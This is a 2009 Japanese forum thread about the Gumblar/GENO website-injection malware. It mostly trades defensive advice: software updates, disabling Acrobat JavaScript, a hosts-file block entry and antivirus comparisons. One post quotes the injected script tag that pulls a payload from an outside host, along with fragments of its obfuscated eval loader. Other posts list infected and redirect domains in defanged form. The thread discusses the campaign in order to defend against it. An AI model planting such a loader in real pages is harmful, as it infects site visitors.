1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ] ■ adobe readerを最新版にアップデートする ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。 インストール後本体をアップデートしておく事 adobe readerを開いて ヘルプ→アップデートの有無をチェック ■ adobe flashplayerを最新版に更新 ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨 ■ acrobat javascriptをオフに adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す ■ブラウザでスクリプト使用を基本無効に設定 FirefoxにてNoscriptを利用 (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す) (sleipnir、IEでも上手に設定するとなんとかなります) 優先度低 ■ Vistaの人ははUACをONにする ■ hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 martuz.cn hostsファイルの在処 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 Windows 95/98/MEの場合→「C:\Windows」 感染が疑わしい人は迷わずクリーンインストール推奨です。 ★Anubisレポート ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★GENOウイルスまとめ ttp://www29.atwiki.jp/geno/
446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:07 ] ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・
447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:34 ] p-frying ●com/ ここも感染してる ていうか前のGENO騒ぎの時から感染してるっぽい
448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:10:06 ] .は●に変えたがh抜き忘れたorz
449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:12:11 ] この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな 発表しなかったらこんなことにならなかったかもな まあそう言うわけにもいかないのかも知れないが
450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:29:19 ] >>446 なにでググってる? martuzあたり?
451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:44:05 ] 木造で中古だと利回りがきつそうで(´・ω・) カワイソス
452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 10:31:32 ] Avast!のWebシールドが最近の*.phpにも反応するようになった
453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 11:29:45 ] 糞チェッカー バージョン指定書きで後で後悔するといったのにねえ さすがアフィ厨
454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 13:25:50 ] >>425-427 <script src=hxxp://fotothhi.be/images/index.php ></script> .phpの中身 //<script> dLLdw=24;if(unescape)dLLdw='';jYCXE=unescape('%'+dLLdw); 〜中(難読化されてたから)略〜 eval(unescape(i0j.replace(/[IlN]/g,jYCXE))); //</script>
455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:17:13 ] サイトはどうやって改ざんされてるんだ?
456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:26:44 ] >>452 いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった 他も拾うようになったのかな
457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:27:38 ] >>455 FTP使って改ざんされてます サーバに攻撃とかそういうのじゃないです つーかこのへんは前と変わってないはず
458 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:52:05 ] >>456 同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ 今はAvast!とKasperskyの対応がよさそう 2/41 (4.88%) ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050 5/41 (12.20%) ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598
459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:39:07 ] 何となく思ったのだが 何気に Vista、Windows7 への移行を促そうとする 大人の事情が暗に蠢いていたりとかするのだろうか…
460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:43:01 ] 7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ
461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 17:56:34 ] >>458 日ごとどころかアクセスするたびにかわるわよ でも非IEでもAvastが対応してきたようだね
462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:08:42 ] XPの脆さが改めて露呈しただけだろ
463 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 18:10:56 ] Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり 居るってことだな MSE普及の一環か
464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:22:40 ] カスペでさっき遮断した 本当に困る
465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:30:55 ] >>463 MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ
466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:34:44 ] >>463 Flash Playerだけじゃないよ
467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:39:31 ] genolists.alink.uic.to/ 新種感染サイトのリストはここ使うの?
468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 19:04:29 ] >>450 Google先生は、AS番号ごとにウイルス感染サイト(gumbler以外も含む)を教えてくれるよ。 例えば、 楽天(infoseek.co.jp、cool.ne.jp) safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820 Softbank(geocities.jp) safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816 とかね。 最近までgumblar/martuzに改竄されて放置されてたサイトは、 新型に改竄されてる可能性が高い。
469 名前:あげ [2009/10/25(日) 20:08:52 ] fileseek.jp/ (携帯専用) PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから 簡易チェッカーとして使えるかもしれん。 ※パケ定必須
470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:05:38 ] >>465 ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか
471 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 22:19:28 ] バスター最新にしても駄目?
472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:43:57 ] >>471 それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない
473 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:45:00 ] >>470 分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる
474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:10:28 ] アップデート全部したんだが、これで再起動しても平気かな?
475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:00 ] ソフトの更新は予防のためにするものであって 感染後にやっても手遅れだよ
476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:15 ] /(^o^)\
477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:51 ] >>474 カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ
478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:56 ] >>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。 ikebananonohana●hp●infoseek●co●jp pengzipk●hp●infoseek●co●jp seiya06●hp●infoseek●co●jp pee3●hp●infoseek●co●jp www●ski-srsc●com www●geocities●jp/fumisugi43/ www●geocities●jp/jr1ujx/ www●geocities●jp/tileaf05/ www●jpla-aichi●com こりゃ、国内60サイトどころじゃないでしょ。
479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:15:55 ] >>477 現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。 機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。 また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。
480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:17:51 ] ニフティもエンジンはカスペだからそっちでやればいいんじゃね
481 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:18:41 ] >>474 ちなみに全部ってのは本当に全部やったの? たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ
482 名前:473 mailto:sage [2009/10/25(日) 23:23:45 ] さらに色々調べたが ノートンはファイルの検査では検出しないけど ブラウザで読み込むと検出する サイトアドレスではなくファイルで検出するようだ この後バスター入れて試してみる
483 名前:473 mailto:sage [2009/10/26(月) 00:10:01 ] バスター入れてみたが試した範囲ではすべて遮断される ただデスクトップにおいたphpファイルは読み込める 2度目以降は無効になるような場合でも遮断される サイトアドレスで遮断してるように思えるがよく分からない
484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:29:06 ] >>483 調査乙
485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:48:20 ] >>483 激乙です! てことは大抵のアンチウイルスソフト入れてる人は 感染したサイト見ても、とりあえず感染は防げてるってことなのかな マカフィーはどうだろう
486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:56:15 ] >>485 みたいのが一番危ないタイプだな
487 名前:473 mailto:sage [2009/10/26(月) 00:58:05 ] >>485 その前に試したPandaは読み込めちゃったね 違う段階で遮断できるかも知れないけど
488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:05:20 ] >>486 アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、 adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな… >>487 そっかー 即レスありがとう
489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:19:27 ] >>488 心配ならOSいれなおし
490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:26:06 ] データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね? このウイルスはそんなことないとかないかorz
491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:47:59 ] >>488 セコムに入っているから大丈夫!と鍵をかけずに外出したようなものだね モノに頼ってそれに過信してしまって 一番肝心なところである それを使う人間がセキュリティへの認識を忘れてしまっては どんなに優れたモノを使っていても意味をなさないよ
492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:51:13 ] アップデートは最低でもこれくらいやらないとな Windows Update / Microsoft Update Adobe Flash Player 10.0.32.18 (IEと非IE両方) Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る) 上記は現段階の新型Daonol/Gumblarには必須 亜種でどうなるか分からないので下記も実施 Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい) Java 6 Update 16 (旧バージョンはすべてアンインストール) あとはQuickTimeとRealPlayerあたりか 使わないものはアンインストールだな
493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:53:31 ] >>490 確実に大丈夫とはいえない
494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:00:49 ] 今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの?
495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:04:00 ] もうFlashなんかやめてSilverlightを採用すればいいのに
496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:06 ] Windows Updateぐらい自動更新の設定にしとこうよ というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに
497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:44 ] 「ぜいじゃく」って読むんだよ、ぼうや
498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:04 ] きじゃくてwww 言語弱者もいいとこwww
499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:49 ] 釣られんなよw
500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:11:04 ] 後釣り宣言カコワルイ
501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:13:52 ] 生酒でも飲んでまったりやろうや
502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:18:19 ] この時間から酒飲むと朝つらいからお断りします
503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:23:56 ] >>494 特定の脆弱性だけじゃなく複数利用してる Adobe製品だけじゃなくMicrosoftのもあった いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ
504 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:37:29 ] 【中卒の為の国語辞典】 脆弱性 【ぜいじゃくせい】 脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。
505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:02:18 ] 前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく ウイルスじゃないから、感染してからバックアップとっても 平気とかどこかで見た気がする。 もちろんデータをクリーンインストールしてから戻すときは 当然ウイルスチェックしてからということだったけど。
506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:05:13 ] ぜいじゃく性ですね すみません 本当に恥ずかしい間違いでした 教えてくれてありがとうございます
507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:15:35 ] 本当の読み方はぜいじゃくしょう ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった 豆知識
508 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:39:39 ] >>507 恥ずかしい限りですが勉強になります やっぱりアップデートとかをこまめにするのが一番ですが 今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は OS再インスコしなくて良さそう?なのかな?
509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:41:22 ] カスペで駆除できたって報告あるか?
510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:50:26 ] ありますんね・・・
511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:09 ] カスペ自らが宣言してるけどどこまで対応してるのかわからん www.kaspersky.co.jp/news?id=207578788
512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:29 ] 試しに感染してみるか 古いアドビのソフトがあれば
513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:03:41 ] 無駄無駄 アンチウィルスソフトに過剰な期待を抱かないほうがいい 日々、腐るほど亜種が湧いてるからな
514 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:04 ] そのうちvistaや7も感染対象になるのかね
515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:25 ] カスペもオンラインスキャナをメンテ中とか鬼だよな。
516 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:11:48 ] Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」 www.forest.impress.co.jp/docs/review/20091020_323014.html hide9999.web.fc2.com/
517 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 07:13:03 ] 既出 もともと自動
518 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:14:02 ] 無料駆除ツールでてますか? カスペ体験版入れるしかないのか・・・
519 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:23:46 ] 体験版じゃなくて製品版買えばいいだろ
520 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 11:45:48 ] HD買ってきてOSインストールして 外したHDを外付けにしてバスター2010でウイルススキャン トロイ式なんとかかんとか と出て隔離に成功 なんでも最新がいいんだなと思って IEは6から8へ バスターも06から10へ 正直新しいPC買ったみたいです(^O^)
521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 14:46:01 ] >>420 富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、 富士通にならってリリース出しました。 【お詫び】電話お問い合わせ窓口の混雑について ttp://121ware.com/navigate/support/121cc/info/20091026/ 東芝 ttp://dynabook.com/assistpc/info/20091022.htm SONY ttp://search.vaio.sony.co.jp/solution/S0910211068384/ DELL ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022
522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 15:09:12 ] >>521 一昨日だっけか?東芝のサポートって類似の質問はないとか言って蹴ってなかったか?
523 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 15:32:57 ] >>508 前回のも普通に駆除できるから 無知が作ったウィキなんて信用するなよ
524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 16:20:54 ] SonyはVistaも対象に含めているのか
525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:01:40 ] なんだろこれ・・・ www■idealgroup-24■com/ → theflyingpoodles■com/images/DSC_0035■php → chezmichel■nl/images/index3■php → bellsworld■com/new_submissions/verhor1■php → psunrise■cn/images-d/index2■php (アクセス拒否) 最後のアクセス拒否以外の中身が妙な404で AguseGatewayで見ると//404 ソース見るといずれも // iframes are EVIL! Hate Zeus! というメッセージ付き
526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:14 ] なんで
527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:54 ] 途中送信orz なんでabout:blank開いてんだこれ 本当に404なら分かるけど
528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:18:49 ] >>524 でもソニーはウイルス名の指定がないな。 とにかくリカバリしやがれ(意訳)の一点張り。あんまりあてにできないのでは。
529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:23:58 ] Zeusっつーとこれかな ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091007/338476/
530 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:25:43 ] Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045 25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、 Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。 G Dataが「JS:Downloader-EZ」で13件を検出した。 ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。
531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:06:13 ] japan.internet.com/webtech/20091010/12.html >Adobe の勧告には、次のような記述がある。 >「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している >Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。 10/13のAcrobatの脆弱性ですが VISTAでもDEPが無効だと駄目だったようですね。 VISTAがプレインストールされているPCだと CPUがDEPにまず対応している気がしますが・・・
532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:44:06 ] XPでハードウェアDEPが有効かつ IE8のメモリ保護が有効だった場合はどうなんでしょうね・・・ VISTAと同様の結果になるのか、違うのか・・・
533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:17:04 ] ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって 上のほうで言われてるから調べてみた。 ■FlashPlayer www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html ■AdobeReader(9.20は編集>環境設定>アップデーターでできた) www.geocities.jp/fssreport/update/article003/index.html >Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、 >ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。 FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、 ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。
534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:32:53 ] Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト 自動でアップデートするものでは無いから大差ない
535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:53:50 ] >>533 いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね
536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:54:31 ] 主導→手動でしたごめん
537 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:13:54 ] Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない アップデートは手動、Adobeのサイト言ってチェックしないといけない
538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:22:16 ] 過去の更新状況から考えると 更新があった場合はコンテンツが表示されたあとで 更新のダイアログが表示されていたはずだから >>533 の場合は既に攻撃を喰らったあとだろう
539 名前:533 mailto:sage [2009/10/27(火) 00:47:38 ] レスくれたひとありがとう。 Flash_Reader_Updateは半自動化しかしてくれなくても、 インターネット前に必ずアップデートするとか、 >>387 の記事のように、タスクスケジューラ使うようにすれば、 >>533 みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。 ソフトDLすることにするわ。 記事みて検索してはじめて、タスクスケジューラを知った初心者だけどw
540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:50:55 ] すまん感染の疑いのある者なんだがご教授願いたい 当方win機(一昨日買ったばかりwin7)とMac(OSX10.4)を使っている。 これらを使ってxoopsを使ったサイトを立ち上げようとした。 xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。 しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。 このエラーをググったらGENOウイルスの仕業らしい、と。 自分的には可能性として 1.win機が感染している 2.Mac機が感染、もしくは保菌者(?)になっている 3.レンタルサーバーの業者自体が感染している なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態 Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態 現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。
541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:17:31 ] >>540 前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、 そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、 上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか 確実にわかるんじゃないかな 今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、 むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが
542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:34:17 ] >>541 ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。 Macのほうはメインマシンだから1日かかりそう>< とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる
543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:52:04 ] Avast!がPDFの検出をするようになった SWFは未確認
544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:02:39 ] もうすぐnortonの期限が切れそうでどれにしようか迷っている ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・ カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象
545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:05:35 ] スレ違いっぽいが GENOの話ならノートンは対応してるぞ
546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:10:38 ] 新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう